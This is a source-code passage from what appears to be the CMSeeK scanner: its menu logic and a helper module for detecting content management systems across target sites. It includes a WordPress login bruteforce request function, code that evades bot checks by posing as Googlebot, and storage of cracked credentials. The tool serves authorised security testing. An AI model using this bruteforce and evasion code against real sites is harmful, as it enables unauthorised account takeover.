124 | ot = open(sites, 'r') | |
125 | file_contents = ot.read().replace('\n','') | |
126 | sites_list = file_contents.split(',') | |
127 | except FileNotFoundError: | |
128 | cmseek.error('Invalid path! CMSeeK is quitting') | |
129 | cmseek.bye() | |
130 | if sites_list != []: | |
131 | if cua == None: | |
132 | cua = cmseek.randomua() | |
133 | for s in sites_list: | |
134 | s = s.replace(' ', '') | |
135 | target = cmseek.process_url(s) | |
136 | if target != '0': | |
137 | core.main_proc(target,cua) | |
138 | cmseek.handle_quit(False) | |
139 | if not cmseek.batch_mode: | |
140 | input('\n\n\tPress ' + cmseek.bold + cmseek.fgreen + '[ENTER]' + cmseek.cln + ' to continue') # maybe a fix? idk | |
141 | else: | |
142 | print('\n') | |
143 | cmseek.warning('Invalid URL: ' + cmseek.bold + s + cmseek.cln + ' Skipping to next') | |
144 | print('\n') | |
145 | cmseek.result('Finished Scanning all targets.. result has been saved under respective target directories','') | |
146 | else: | |
147 | cmseek.error("No url provided... CMSeeK is exiting") | |
148 | cmseek.bye() | |
149 | ||
150 | ################################ | |
151 | ### THE MAIN MENU ### | |
152 | ################################ | |
153 | cmseek.clearscreen() | |
154 | cmseek.banner("Tip: You can use cmseek via arguments as well check the help menu for more information") | |
155 | print (" Input Description") | |
156 | print ("======= ==============================") | |
157 | print (" [1] CMS detection and Deep scan") | |
158 | print (" [2] Scan Multiple Sites") | |
159 | print (" [3] Bruteforce CMSs") | |
160 | print (" [U] Update CMSeeK") | |
161 | print (" [R] Rebuild Cache (Use only when you add any custom module)") | |
162 | print (" [0] Exit CMSeeK :( \n") | |
163 | ||
164 | selone = input("Enter Your Desired Option: ").lower() | |
165 | if selone == 'r': | |
166 | cmseek.update_brute_cache() | |
167 | elif selone == 'u': | |
168 | cmseek.update() | |
169 | elif selone == '0': | |
170 | cmseek.bye() | |
171 | ||
172 | elif selone == "1": | |
173 | # There goes the cms detection thingy | |
174 | cmseek.clearscreen() | |
175 | cmseek.banner("CMS Detection And Deep Scan") | |
176 | site = cmseek.targetinp("") # Get The User input | |
177 | if cua == None: | |
178 | cua = cmseek.randomua() | |
179 | core.main_proc(site,cua) | |
180 | cmseek.handle_quit() | |
181 | ||
182 | elif selone == '2': | |
183 | cmseek.clearscreen() | |
184 | cmseek.banner("CMS Detection And Deep Scan") | |
185 | sites_list = [] | |
186 | sites = input('Enter comma separated urls(http://1.com,https://2.org) or enter path of file containing URLs (comma separated): ') | |
187 | if 'http' not in sites or '://' not in sites: | |
188 | cmseek.info('Treating input as path') | |
189 | try: | |
190 | ot = open(sites, 'r') | |
191 | file_contents = ot.read().replace('\n','') | |
192 | sites_list = file_contents.split(',') | |
193 | except FileNotFoundError: | |
194 | cmseek.error('Invalid path! CMSeeK is quitting') | |
195 | cmseek.bye() | |
196 | else: | |
197 | cmseek.info('Treating input as URL list') | |
198 | sites_list = sites.split(',') | |
199 | if sites_list != []: | |
200 | if cua == None: | |
201 | cua = cmseek.randomua() | |
202 | for s in sites_list: | |
203 | s = s.replace(' ', '') | |
204 | target = cmseek.process_url(s) | |
205 | if target != '0': | |
206 | core.main_proc(target,cua) | |
207 | cmseek.handle_quit(False) | |
208 | if not cmseek.batch_mode: | |
209 | input('\n\n\tPress ' + cmseek.bold + cmseek.fgreen + '[ENTER]' + cmseek.cln + ' to continue') # maybe a fix? idk | |
210 | else: | |
211 | print('\n') | |
212 | cmseek.warning('Invalid URL: ' + cmseek.bold + s + cmseek.cln + ' Skipping to next') | |
213 | print('\n') | |
214 | cmseek.result('Finished Scanning all targets.. result has been saved under respective target directories','') | |
215 | else: | |
216 | cmseek.error("No url provided... CMSeeK is exiting") | |
217 | cmseek.bye() | |
218 | ||
219 | elif selone == "3": | |
220 | cmseek.clearscreen() | |
221 | cmseek.banner("CMS Bruteforce Module") | |
222 | ## I think this is a modular approch | |
223 | brute_dir = os.path.join(cmseek.cmseek_dir, 'cmsbrute') | |
224 | brute_cache = os.path.join(brute_dir, 'cache.json') | |
225 | if not os.path.isdir(brute_dir): | |
226 | cmseek.error("bruteforce directory missing! did you mess up with it? Anyways CMSeek is exiting") | |
227 | cmseek.bye() | |
228 | else: | |
229 | print ("[#] List of CMSs: \n") | |
230 | print (cmseek.bold) | |
231 | read_cache = open(brute_cache, 'r') | |
232 | b_cache = read_cache.read() | |
233 | cache = json.loads(b_cache) | |
234 | brute_list = [] | |
235 | for c in cache: | |
236 | brute_list.append(c) | |
237 | brute_list = sorted(brute_list) | |
238 | for i,x in enumerate(brute_list): | |
239 | n = x | |
240 | mod = "cmsbrute." + x | |
241 | exec(n + " = importlib.import_module(mod)") | |
242 | print('['+ str(i) +'] ' + cache[x]) | |
243 | print(cmseek.cln + '\n') | |
244 | cmstobrute = input('Select CMS: ') | |
245 | try: | |
246 | kek = brute_list[int(cmstobrute)] | |
247 | print(kek) | |
248 | cms_brute = getattr(locals().get(kek), 'start') | |
249 | cms_brute() | |
250 | except IndexError: | |
251 | cmseek.error('Invalid Input!') | |
252 | else: | |
253 | cmseek.error("Invalid Input!") | |
254 | cmseek.bye() |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | # Thought this file was getting quite bloated so refectored it | |
5 | ||
6 | import errno | |
7 | import sys | |
8 | import os | |
9 | import random | |
10 | import shutil | |
11 | import signal | |
12 | import subprocess | |
13 | import urllib.request | |
14 | from http.cookiejar import CookieJar | |
15 | import json | |
16 | from datetime import datetime | |
17 | import time | |
18 | import re | |
19 | from cmseekdb.getsource import * | |
20 | from cmseekdb.config import * | |
21 | ||
22 | cmseek_dir = os.path.dirname(os.path.abspath(__file__)).replace('cmseekdb','')[:-1] | |
23 | total_requests = 0 | |
24 | cstart = time.time() | |
25 | redirect_conf = '0' # 0 = prompt for redirect, 1 = follow redirect, 2 = do not follow any redirect | |
26 | batch_mode = False # When set to true cmseek won't ask you to press enter after every site in a list is scanned | |
27 | ignore_cms = [] # add cms id that you want to skip | |
28 | strict_cms = [] # add cms ids that you want to detect.. no other cmses will be detected when any id is provided. | |
29 | report_index = {} # Contains previous scan results | |
30 | skip_scanned = False # When set to true CMSeeK witll ignore target whose CMS had been previously detected! | |
31 | light_scan = False # When enabled, we don't perform deep-scan only detect CMS and version. | |
32 | only_cms = False # When enabled, we just detect the CMS no version or deepscan is performed. | |
33 | ||
34 | # all the color codes goes here | |
35 | white = "\033[97m" | |
36 | black = "\033[30m\033[1m" | |
37 | yellow = "\033[93m" | |
38 | orange = "\033[38;5;208m" | |
39 | blue = "\033[34m" | |
40 | lblue = "\033[36m" | |
41 | cln = "\033[0m" | |
42 | green = "\033[92m" | |
43 | fgreen = "\033[32m" | |
44 | red = "\033[91m" | |
45 | magenta = "\033[35m" | |
46 | blackbg = "\033[100m" | |
47 | whitebg = "\033[107m" | |
48 | bluebg = "\033[44m" | |
49 | lbluebg = "\033[106m" | |
50 | greenbg = "\033[42m" | |
51 | lgreenbg = "\033[102m" | |
52 | yellowbg = "\033[43m" | |
53 | lyellowbg = "\033[103m" | |
54 | violetbg = "\033[48;5;129m" | |
55 | redbg = "\033[101m"; | |
56 | grey = "\033[37m"; | |
57 | cyan = "\033[36m"; | |
58 | bold = "\033[1m"; | |
59 | ||
60 | # access_directory | |
61 | if access_directory == "" or not os.path.exists(access_directory): | |
62 | # no custom path provided or the path provided is wrong! | |
63 | # show a warning if the case is wrong path | |
64 | if not os.path.exists(access_directory) and access_directory != "": | |
65 | if verbose: | |
66 | print(bold + yellow + "[!] " + cln + "Invalid access_directory! falling back to default") | |
67 | ||
68 | if os.access(cmseek_dir, os.W_OK): | |
69 | # use the parent CMSeeK directory if it is writeable | |
70 | access_directory = cmseek_dir | |
71 | else: | |
72 | if cmseek_dir == os.getcwd(): | |
73 | # current directory and cmseek directory are same and write access not available. show error if --batch is not used | |
74 | if not batch_mode: | |
75 | input(bold + red + "[x] " + "No write access in current directory, Reports will not be saved! [ENTER to continue]" + cln) | |
76 | ||
77 | access_directory = cmseek_dir | |
78 | else: | |
79 | # current directory is different | |
80 | access_directory = os.getcwd() | |
81 | ||
82 | def banner (txt): | |
83 | # The sexy banner!!! | |
84 | global cmseek_version | |
85 | print(bold + fgreen + """ | |
86 | {1} {5}___ _ _ {1}__{5}__ ____ {1}____{5} _ {1}_{5} | |
87 | | |{1}\/{5}| {1}[{5}__ {1}|{5}___ |{1}___{5} |{1}_{5}/ {0}by {4}@r3dhax0r{5} | |
88 | {1}|{5}_{1}__{5} | | ___{1}|{5} |{1}___{5} {1}|{5}___ {1}|{5} \{1}_{5} {2}Version {3}{1} K-RONA | |
89 | """.format(orange, lblue, yellow, cmseek_version, red, white)) | |
90 | if txt != "": | |
91 | print(whitebg + black + bold) | |
92 | print(" [+] " + txt + " [+] " + cln) | |
93 | else: | |
94 | print(cln + bold + lbluebg + black + " Author: " + cln + bold + " https://twitter.com/r3dhax0r" + blackbg + white + "\n GitHub: " + cln + bold + " https://github.com/Tuhinshubhra \n" + cln + '\n') | |
95 | print(cln) | |
96 | return | |
97 | ||
98 | def help(): | |
99 | # The help screen | |
100 | print( | |
101 | """ | |
102 | CMSeeK Version {0} | |
103 | Github: {4} | |
104 | Coded By:{1}{3} @r3dhax0r {2} | |
105 | ||
106 | USAGE: | |
107 | python3 cmseek.py (for guided scanning) OR | |
108 | python3 cmseek.py [OPTIONS] <Target Specification> | |
109 | ||
110 | SPECIFING TARGET: | |
111 | -u URL, --url URL Target Url | |
112 | -l LIST, --list LIST Path of the file containing list of sites | |
113 | for multi-site scan (comma separated) | |
114 | ||
115 | MANIPULATING SCAN: | |
116 | -i cms, --ignore--cms cms Specify which CMS IDs to skip in order to | |
117 | avoid flase positive. separated by comma "," | |
118 | ||
119 | --strict-cms cms Checks target against a list of provided | |
120 | CMS IDs. separated by comma "," | |
121 | ||
122 | --skip-scanned Skips target if it's CMS was previously detected. | |
123 | ||
124 | --light-scan Skips Deep Scan. Does CMS and version detection only. | |
125 | ||
126 | -o, --only-cms Only detect CMS, ignore deep scan and version detection. | |
127 | ||
128 | RE-DIRECT: | |
129 | --follow-redirect Follows all/any redirect(s) | |
130 | --no-redirect Skips all redirects and tests the input target(s) | |
131 | ||
132 | USER AGENT: | |
133 | -r, --random-agent Use a random user agent | |
134 | --googlebot Use Google bot user agent | |
135 | --user-agent USER_AGENT Specify a custom user agent | |
136 | ||
137 | OUTPUT: | |
138 | -v, --verbose Increase output verbosity | |
139 | ||
140 | VERSION & UPDATING: | |
141 | --update Update CMSeeK (Requires git) | |
142 | --version Show CMSeeK version and exit | |
143 | ||
144 | HELP & MISCELLANEOUS: | |
145 | -h, --help Show this help message and exit | |
146 | --clear-result Delete all the scan result | |
147 | --batch Never ask you to press enter after every site in a list is scanned | |
148 | ||
149 | EXAMPLE USAGE: | |
150 | python3 cmseek.py -u example.com # Scan example.com | |
151 | python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) | |
152 | python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here | |
153 | python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent | |
154 | python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com | |
155 | ||
156 | """.format(cmseek_version,red, cln, bold, GIT_URL)) | |
157 | bye() | |
158 | ||
159 | def signal_handler(signal, frame): | |
160 | # Handle Ctrl+c | |
161 | handle_quit() | |
162 | ||
163 | signal.signal(signal.SIGINT, signal_handler) | |
164 | ||
165 | def clearscreen(): | |
166 | if os.name == 'nt': | |
167 | os.system('cls') | |
168 | # for mac and linux(here, os.name is 'posix') | |
169 | else: | |
170 | os.system('clear') | |
171 | ||
172 | def bye(): | |
173 | bye_dict = ["adios","adieu","addio","adeus","aloha","arrivederci","auf Wiedersehen","au revoir","sayonara","shalom","totsiens","vale","zaijian","Aabar dekha hobey","Fir milenge","Annyeong", "Ja mata ne", "До Встречи"] | |
174 | this_time = random.choice(bye_dict) | |
175 | print('\n' + bold + red + ' CMSeeK says ~ ' + this_time + cln) | |
176 | quit() | |
177 | ||
178 | def statement(msg): | |
179 | # Print only if verbose | |
180 | global verbose | |
181 | if verbose == True: | |
182 | print("[+] " + msg) | |
183 | ||
184 | def error(msg): | |
185 | print(bold + red + "[x] " + msg + cln) # switched to x from ❌ .. | |
186 | ||
187 | def warning(msg): | |
188 | print(bold + yellow + "[!] " + cln + msg) | |
189 | ||
190 | def info(msg): | |
191 | print(bold + lblue + "[i] " + cln + msg) | |
192 | ||
193 | def success(msg): | |
194 | print(bold + fgreen + "[*] " + cln + msg) | |
195 | ||
196 | def result(stm, msg): | |
197 | try: print(bold + fgreen + "[✔] " + stm + cln + msg) | |
198 | except UnicodeEncodeError: | |
199 | print(bold + fgreen + "[>] " + stm + cln + msg) | |
200 | ||
201 | def process_url(target): | |
202 | # Used to format the url for multiple site scan | |
203 | # 0 = invalid URL | |
204 | if target == "": | |
205 | return '0' | |
206 | elif "://" in target and "http" in target: | |
207 | target = target | |
208 | # if not target.endswith('/'): | |
209 | # if '.php' in target or '.html' in target or '.asp' in target or '.aspx' in target or '.htm' in target or '.py' in target or '.pl' in target: | |
210 | # target = target | |
211 | # else: | |
212 | # target = target + '/' | |
213 | else: | |
214 | target = 'http://' + target | |
215 | # if not target.endswith('/'): | |
216 | # if '.php' in target or '.html' in target or '.asp' in target or '.aspx' in target or '.htm' in target or '.py' in target or '.pl' in target: | |
217 | # target = target | |
218 | # else: | |
219 | # target = target + '/' | |
220 | init_result_dir(target) | |
221 | update_log('url', str(target)) | |
222 | return target | |
223 | ||
224 | ||
225 | def targetinp(iserr): | |
226 | # site url validator and stuff... | |
227 | if iserr != "": | |
228 | target = input(iserr + " : " + cln).lower() | |
229 | else: | |
230 | target = input("Enter target site (https://example.tld): ").lower() | |
231 | if "://" in target and "http" in target: | |
232 | if not target.endswith('/'): | |
233 | target = target + '/' | |
234 | init_result_dir(target) | |
235 | update_log('url', str(target)) | |
236 | return target | |
237 | else: | |
238 | return targetinp(red + "Invalid URL format, correct format (https://example.tld)") | |
239 | ||
240 | def init_result_dir(url): | |
241 | ### initiate log directory and stuffs | |
242 | ## trim the url to use as a suitable directory Name | |
243 | if "http://" in url: | |
244 | url = url.replace('http://', '') | |
245 | elif "https://" in url: | |
246 | url = url.replace('https://', '') | |
247 | else: | |
248 | print('wtf man did you forget to use the targetinp function!!!') | |
249 | if url.endswith('/'): | |
250 | # This seemed preety ugly to me tbh | |
251 | url = list(url) | |
252 | url[-1] = "" | |
253 | url = "".join(url) | |
254 | tor = {'/','!','?','#','@','&','%','\\','*', ':'} | |
255 | for r in tor: | |
256 | url = url.replace(r, '_') | |
257 | ||
258 | ||
259 | global access_directory | |
260 | result_dir = os.path.join(access_directory, "Result", url) | |
261 | json_log = os.path.join(result_dir, 'cms.json') | |
262 | ||
263 | ## check if the log directory exist | |
264 | if not os.path.isdir(result_dir): | |
265 | try: | |
266 | os.makedirs(result_dir) | |
267 | f = open(json_log,"w+") | |
268 | f.write("") | |
269 | f.close() | |
270 | # print('directory created') | |
271 | except OSError as exc: # Guard against race condition | |
272 | if exc.errno != errno.EEXIST: | |
273 | raise | |
274 | else: | |
275 | # Directory exists, check for json log | |
276 | if not os.path.isfile(json_log): | |
277 | f = open(json_log,"w+") | |
278 | f.write("") | |
279 | f.close() | |
280 | else: | |
281 | # read log and save it to a variable | |
282 | f = open(json_log,"r") | |
283 | log_cont = f.read() | |
284 | if log_cont != "": | |
285 | try: | |
286 | global log | |
287 | log = log_cont | |
288 | except ValueError: | |
289 | # invalid json file... clear it i guess | |
290 | f = open(json_log,"w+") | |
291 | f.write("") | |
292 | f.close() | |
293 | global log_dir | |
294 | log_dir = result_dir | |
295 | update_log('last_scanned', str(datetime.now())) | |
296 | ||
297 | ||
298 | def update_log(key, value, _isString=True): | |
299 | if key != "": | |
300 | global log | |
301 | a = json.loads(log) | |
302 | a[key] = str(value) if _isString else value | |
303 | log = json.JSONEncoder().encode(a) | |
304 | ||
305 | def clear_log(): | |
306 | # Clear Result directory | |
307 | global access_directory | |
308 | resdir = os.path.join(access_directory, 'Result') | |
309 | if os.path.isdir(resdir): | |
310 | shutil.rmtree(resdir) | |
311 | os.makedirs(resdir) | |
312 | success('Result directory cleared successfully!') | |
313 | bye() | |
314 | else: | |
315 | warning('Results directory not found!') | |
316 | bye() | |
317 | ||
318 | def handle_quit(end_prog = True): | |
319 | # in case of unwanted exit this function should take care of writing the json log | |
320 | global log_dir | |
321 | if log_dir != "": | |
322 | log_file = os.path.join(log_dir, 'cms.json') | |
323 | # print(log_file) | |
324 | global log | |
325 | f = open(log_file,"w+") | |
326 | json_l = json.loads(log) | |
327 | log_to_write = json.dumps(json_l, sort_keys=True, indent=4) | |
328 | f.write(log_to_write) | |
329 | # print('written: ' + log) | |
330 | f.close() | |
331 | print('\n') | |
332 | # info('Log saved in: ' + fgreen + bold + log_file + cln) | |
333 | if end_prog == True: | |
334 | bye() | |
335 | else: | |
336 | log = '{"url":"","last_scanned":"","detection_param":"","cms_id":"","cms_name":"","cms_url":""}' | |
337 | ||
338 | def update_brute_cache(): | |
339 | clearscreen() | |
340 | banner("Updating Bruteforce Cache") | |
341 | global cmseek_dir | |
342 | brute_dir = os.path.join(cmseek_dir, "cmsbrute") | |
343 | brute_cache = os.path.join(brute_dir, 'cache.json') | |
344 | cache_json = {} | |
345 | if not os.path.isdir(brute_dir): | |
346 | try: | |
347 | error('CMSeeK could not find the bruteforce directory, Creating Brute directory') | |
348 | os.makedirs(brute_dir) | |
349 | info('Bruteforce directory created, add some modules from: https://github.com/Tuhinshubhra/cmseek') | |
350 | bye() | |
351 | except OSError as exc: | |
352 | if exc.errno != errno.EEXIST: | |
353 | raise | |
354 | py_files = os.listdir(brute_dir) | |
355 | modules = [] | |
356 | modulen = [] | |
357 | for f in py_files: | |
358 | if f.endswith('.py') and f != '__init__.py': | |
359 | fo = open(os.path.join(brute_dir, f), 'r') | |
360 | mod_cnt = fo.read() | |
361 | if 'cmseekbruteforcemodule' in mod_cnt and 'Bruteforce module' in mod_cnt: | |
362 | n = [] | |
363 | n = re.findall(r'\# (.*?) Bruteforce module', mod_cnt) | |
364 | if n != [] and n[0] != "": | |
365 | modules.append(f) | |
366 | modulen.append(n[0]) | |
367 | if not modules == [] and modulen != []: | |
368 | info('Found ' + str(len(modules)) + ' modules.. Writting cache') | |
369 | for index,module in enumerate(modules): | |
370 | module = module.replace('.py','') | |
371 | cache_json[module] = modulen[index] | |
372 | tuh = open(brute_cache, 'w+') | |
373 | tuh.write(json.dumps(cache_json)) | |
374 | tuh.close() | |
375 | success('The following modules has been added to the cache: \n') | |
376 | for ma in cache_json: | |
377 | print('> ' + bold + ma + '.py ' + cln + '---> ' + bold + cache_json[ma] + cln + ' Bruteforce Module') | |
378 | print('\n') | |
379 | result('Cache Updated! Enjoy CMSeeK with new modules ;)','') | |
380 | else: | |
381 | warning('Could not find any modules! either there are no modules or someone messed with em!') | |
382 | bye() | |
383 | ||
384 | def update(): | |
385 | # Check For Update | |
386 | clearscreen() | |
387 | banner("Update Menu") | |
388 | global cmseek_version | |
389 | my_version = int(cmseek_version.replace('.','')) | |
390 | info("Checking for updates") | |
391 | get_version = getsource('https://raw.githubusercontent.com/Tuhinshubhra/CMSeeK/master/current_version',randomua('generate')) | |
392 | if get_version[0] != '1': | |
393 | error('Could not get latest version, Error: ' + get_version[1]) | |
394 | bye() | |
395 | else: | |
396 | latest_version = get_version[1].replace('\n','') | |
397 | serv_version = int(latest_version.replace('.','')) | |
398 | info("CMSeeK Version: " + cmseek_version) | |
399 | success("Latest Version: " + latest_version) | |
400 | if my_version > serv_version: | |
401 | print('\n') | |
402 | error("Either you or me (The Developer) messed things up.\n" + cln + "[↓] Download the proper version from: " + fgreen + bold + GIT_URL) | |
403 | elif my_version == serv_version: | |
404 | print('\n') | |
405 | result("CMSeeK is up to date, Thanks for checking update tho.. It's a good practise",'') | |
406 | else: | |
407 | print('\n') | |
408 | #success("Update available!") | |
409 | success("Update available!") | |
410 | update_me = input("[#] Do you want to update now? (y/n): ") | |
411 | if update_me.lower() == 'y': | |
412 | print(bold + fgreen + "[↓]" + cln + " Downloading Update...") | |
413 | succes = False | |
414 | try: | |
415 | global cmseek_dir | |
416 | lock_file = os.path.join(cmseek_dir, "/.git/index.lock") | |
417 | if os.path.isfile(lock_file): | |
418 | statement("Removing index.lock file from .git directory") | |
419 | # Solve the index.lock issue | |
420 | os.remove(lock_file) | |
421 | subprocess.run(("git checkout . && git pull %s HEAD") % GIT_URL, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) | |
422 | #os.system("git checkout . && git pull %s HEAD" % GIT_URL) | |
423 | vt = open('current_version', 'r') | |
424 | v_test = int(vt.read().replace('\n','').replace('.','')) | |
425 | # print(v_test) | |
426 | # print(serv_version) | |
427 | if v_test == serv_version: | |
428 | # Check if update successful | |
429 | succes = True | |
430 | except: | |
431 | print("Unexpected error:", sys.exc_info()[0]) | |
432 | raise | |
433 | error("Automatic Update Failed! Pleae download manually from: " + cln + GIT_URL) | |
434 | if succes == True: | |
435 | result("CMSeeK Updated To Latest Version! Enjoy", "") | |
436 | else: | |
437 | warning(bold + orange + "Update might be not successful.. Download manually from: " + cln + GIT_URL) | |
438 | else: | |
439 | print('\n') | |
440 | warning("Automatic Update Terminated!") | |
441 | info("Update Manually from: " + fgreen + bold + GIT_URL + cln) | |
442 | bye() | |
443 | ||
444 | ||
445 | def savebrute(url,adminurl,username,password): | |
446 | # write the results to a result file | |
447 | if url != "" and adminurl != "" and username != "" and password != "": | |
448 | global log_dir | |
449 | brute_file = os.path.join(log_dir, 'bruteforce_result_' + username + '_.txt') | |
450 | old_file = os.path.join(log_dir, 'bruteforce_result_' + username + '_.old.txt') | |
451 | brute_result = "### CMSeeK Bruteforce Result\n\n\nSite: " + url + "\n\nLogin URL: " + adminurl + "\n\nUsername: " + username + "\n\nPassword: " + password | |
452 | print('\n\n') # Pretty sloppy move there ;-; | |
453 | if not os.path.isfile(brute_file): | |
454 | # No previous bruteforce result file Found | |
455 | f = open(brute_file, 'w+') | |
456 | f.write(brute_result) | |
457 | f.close() | |
458 | success('Credentials stored at: ' + bold + brute_file + cln) | |
459 | else: | |
460 | os.rename(brute_file, old_file) | |
461 | info("Old result file found and moved to: " + old_file) | |
462 | f = open(brute_file, 'w+') | |
463 | f.write(brute_result) | |
464 | f.close() | |
465 | success('New credentials stored at: ' + bold + brute_file + cln) | |
466 | ||
467 | ||
468 | def getsource(url, ua): | |
469 | ''' | |
470 | (url, useragent) | |
471 | return type: [(0/1/2), (error/source code/error), (empty/http headers/empty)] | |
472 | ''' | |
473 | raw_source = getrawsource(url, ua) | |
474 | global total_requests | |
475 | total_requests += 1 | |
476 | if 'Please prove that you are human' in raw_source[1] or '?ckattempt=' in raw_source[1]: | |
477 | warning('Browser validation detected.. trying to evade...') | |
478 | ## This can be evaded by using googlebot as user agent so let's do that | |
479 | raw_source = getrawsource(url, 'Googlebot/2.1 (+http://www.google.com/bot.html)') | |
480 | ## final check.. | |
481 | if '?ckattempt=' in raw_source[1]: | |
482 | error('Failed to evade Browser validation, detection results might not be accurate!') | |
483 | return raw_source | |
484 | else: | |
485 | success('Browser validation successfully evaded..') | |
486 | return raw_source | |
487 | ||
488 | if 'src="/aes.js"' in raw_source[1] and '?i=1' in raw_source[1]: | |
489 | warning('Browser validation detected.. trying to evade...') | |
490 | ## This can be evaded by using googlebot as user agent so let's do that | |
491 | raw_source = getrawsource(url, 'Googlebot/2.1 (+http://www.google.com/bot.html)') | |
492 | ## final check.. | |
493 | if '?i=' in raw_source[1] and 'src="/aes.js"' in raw_source[1]: | |
494 | error('Failed to evade Browser validation, detection results might not be accurate!') | |
495 | return raw_source | |
496 | else: | |
497 | success('Browser validation successfully evaded..') | |
498 | return raw_source | |
499 | if raw_source[2] == '403': | |
500 | if 'Abuse: Your connection is not welcome due to: Bot UA' in raw_source[3] or 'Warning: 199' in raw_source[3]: | |
501 | warning('UA validation detected.. trying to evade...') | |
502 | raw_source = getrawsource(url, 'Googlebot/2.1 (+http://www.google.com/bot.html)') | |
503 | if 'Bot UA' in raw_source[2] and 'Warning: 199' in raw_source[2]: | |
504 | error('Failed to evade UA validation, detection results might not be accurate!') | |
505 | return raw_source | |
506 | else: | |
507 | success('UA validation successfully evaded..') | |
508 | return raw_source | |
509 | ||
510 | return raw_source | |
511 | ||
512 | def check_url(url,ua): | |
513 | global total_requests | |
514 | total_requests += 1 | |
515 | request = urllib.request.Request(url) | |
516 | request.add_header('User-Agent', ua) | |
517 | request.get_method = lambda: 'HEAD' | |
518 | try: | |
519 | urllib.request.urlopen(request) | |
520 | return '1' | |
521 | except urllib.request.HTTPError: | |
522 | return '0' | |
523 | ||
524 | def wpbrutesrc(url, user, pwd): | |
525 | redirecto = url + '/wp-admin/' | |
526 | url = url + '/wp-login.php' | |
527 | ua = randomua('generatenewuaeverytimetobesafeiguess') | |
528 | try: | |
529 | ckreq = urllib.request.Request( | |
530 | url, | |
531 | data=urllib.parse.urlencode({'log' : user, 'pwd' : pwd, 'wp-submit' : 'Log In', 'redirect_to' : redirecto}).encode("utf-8"), | |
532 | headers={ | |
533 | 'User-Agent': ua | |
534 | } | |
535 | ) | |
536 | with urllib.request.urlopen(ckreq, timeout=4) as response: | |
537 | scode = response.read().decode() | |
538 | headers = str(response.info()) | |
539 | rurl = response.geturl() | |
540 | r = ['1', scode, headers, rurl] ## 'success code', 'source code', 'http headers' | |
541 | return r | |
542 | except Exception as e: | |
543 | e = str(e) | |
544 | r = ['2', e, '', ''] ## 'error code', 'error message', 'empty' | |
545 | return r | |
546 | ||
547 | def randomua(rnd = None): # Randomized or User defined useragent | |
548 | a = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1","Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)","Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1","Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1","Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)","Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5","Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13","Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1","Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0","Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0","Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00","Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like 